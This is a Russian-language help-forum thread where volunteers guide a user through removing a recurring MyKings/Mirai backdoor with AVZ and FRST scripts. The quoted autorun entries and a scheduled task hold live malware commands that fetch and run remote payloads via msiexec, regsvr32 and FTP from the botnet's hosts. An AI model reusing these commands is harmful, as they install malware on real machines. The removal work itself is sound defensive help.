не удается удалить вирус Троян Backdoor.Win32.Mirai.a.

[Eternal]

Добрый день. Компьютер заражен вирусом Backdoor.Win32.Mirai.a. Антивирус Касперский удаляет его, но после перезагрузки вирус появляется снова. Также в шедулере появляются два задания, первое запускает - my1.bat, второе - msinfo.exe.  Самостоятельно удалить не получилось, прошу помощи.

CollectionLog-2017.05.04-14.22.zip

[SQ]

Здравствуйте,

Что из следующего Вам знакомо?

O4 - Global User Startup: bginfo.vbs
O4 - HKLM\..\Run: [rundll32] cmd /c if exist c:\windows\debug\item.dat start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O4 - HKLM\..\Run: [start1] msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
O4 - HKLM\..\Run: [start] regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
O4 - HKU\S-1-5-21-4173327269-1302852069-987730624-292894\..\Run: [audiodg] c:\programdata\audiodg.exe (User 'Pavel.Zhilnikov')

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
 StopService('MpsSvcc');
 StopService('Windowscurryus');
 DeleteService('MpsSvcc');
 QuarantineFile('C:\WINDOWS\SysWOW64\srvany.exe','');
 QuarantineFile('C:\Windows\Help\svch0st.exe','');
 QuarantineFileF('C:\Windows\Help', '*.exe,*.dll,*.sys,*.pif', false,'', 0, 0);
 QuarantineFile('C:\Windows\debug\Moner\Systmms.exe','');
 QuarantineFileF('C:\Windows\debug\Moner', '*.exe,*.dll,*.sys,*.pif', false,'', 0, 0);
 QuarantineFile('c:\programdata\audiodg.exe','');
 QuarantineFile('c:\windows\debug\item.dat','');
 DeleteFile('C:\Windows\Help\svch0st.exe','32');
 DeleteFile('c:\programdata\audiodg.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','rundll32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1');
 RegKeyParamDel('HKEY_USERS','S-1-5-21-4173327269-1302852069-987730624-292894\Software\Microsoft\Windows\CurrentVersion\Run','audiodg');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
end.

После выполнения скрипта перезагрузите сервер вручную.

После перезагрузки:
- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.
1. В заголовке письма напишите "Запрос на исследование вредоносного файла".
2. В письме напишите "Выполняется запрос хэлпера".
3. Прикрепите файл карантина и нажмите "Отправить"
4. Полученный ответ сообщите здесь (с указанием номера KLAN)



- Подготовьте лог AdwCleaner и приложите его в теме.
 

[Eternal]

[KLAN-6192970763]

Благодарим за обращение в Антивирусную Лабораторию

 

Присланные вами файлы и ссылки были проверены в автоматическом режиме

 

В антивирусных базах информация по присланным вами файлам отсутствует:

audiodg.exe

 

Перечисленные файлы имеют безопасный формат и не могут быть вредоносными:

image001.jpg

 

 

 

AdwCleanerS0.txt

[regist]

Что из следующего Вам знакомо?

не ответили.

[Eternal]

O4 - Global User Startup: bginfo.vbs
O4 - HKLM\..\Run: [rundll32] cmd /c if exist c:\windows\debug\item.dat start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O4 - HKLM\..\Run: [start1] msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
O4 - HKLM\..\Run: [start] regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
O4 - HKU\S-1-5-21-4173327269-1302852069-987730624-292894\..\Run: [audiodg] c:\programdata\audiodg.exe (User 'Pavel.Zhilnikov')

 

Знаком только первый файл, остальные не мои.

[SQ]

- Скачайте Farbar Recovery Scan Tool  и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
• Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
  
• Нажмите кнопку Scan.
• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
  

 

[Eternal]

скан сделал, отчеты прилагаю

FRST.txt

Addition.txt

[SQ]

Знакома ли Вам?

[Net Windows] => c:\Newra.exe

Похоже, что виновник пользователь:

C:\Users\Lenara

• Закройте и сохраните все открытые приложения.
• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  

  CreateRestorePoint:
  File: c:\Newra.exe
  Zip: c:\Newra.exe
  HKU\S-1-5-21-3793589222-921306656-2052304484-1439\...\Run: [Net Windows] => c:\Newra.exe
  File: C:\Windows\debug\Moner\Systmms.exe
  Folder: C:\Windows\debug\Moner
  File: C:\WINDOWS\SysWOW64\srvany.exe
  Task: {50AFD522-0E2D-4CD6-BC4E-2BD879EAE6DA} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что сервер возможно будет перезагружен.

После выполнения фикса на рабочем столе образуется архив (<дата>_<время>.zip) отправьте карантин на newvirus@kaspersky.com.

[Eternal]

 KLAN-6197087774

Благодарим за обращение в Антивирусную Лабораторию

 

Присланные вами файлы и ссылки были проверены в автоматическом режиме

 

В антивирусных базах информация по присланным вами файлам отсутствует:

05.05.2017_15.59.03.zip

 

Перечисленные файлы имеют безопасный формат и не могут быть вредоносными:

image001.jpg

 

 

p.s. вирус снова себя проявил, в папке windows\debug появляются файлы item.dat и PASSWD.LOG, в процессах появляется Rundll.exe cо строкой ServiceMain aaaa

[SQ]

 

Необходим Fixlog.txt после выполнения предыдущего фикса.

[regist]

+ пожалуйста,

 

1. Скачайте Universal Virus Sniffer (uVS)
2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
   
   !!!Внимание.
   Если у вас установлены архиваторы
   WinRAR
   или
   7-Zip
   , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
   
   !!! Обратите внимание
   , что утилиты необходимо запускать от имени Администратора. По умолчанию в
   Windows XP
   так и есть. В
   Windows Vista
   и
   Windows 7
   администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
   Запуск от имени Администратора
   , при необходимости укажите пароль администратора и нажмите
   "Да"
   .

5. Подробнее читайте в руководстве Как подготовить лог UVS.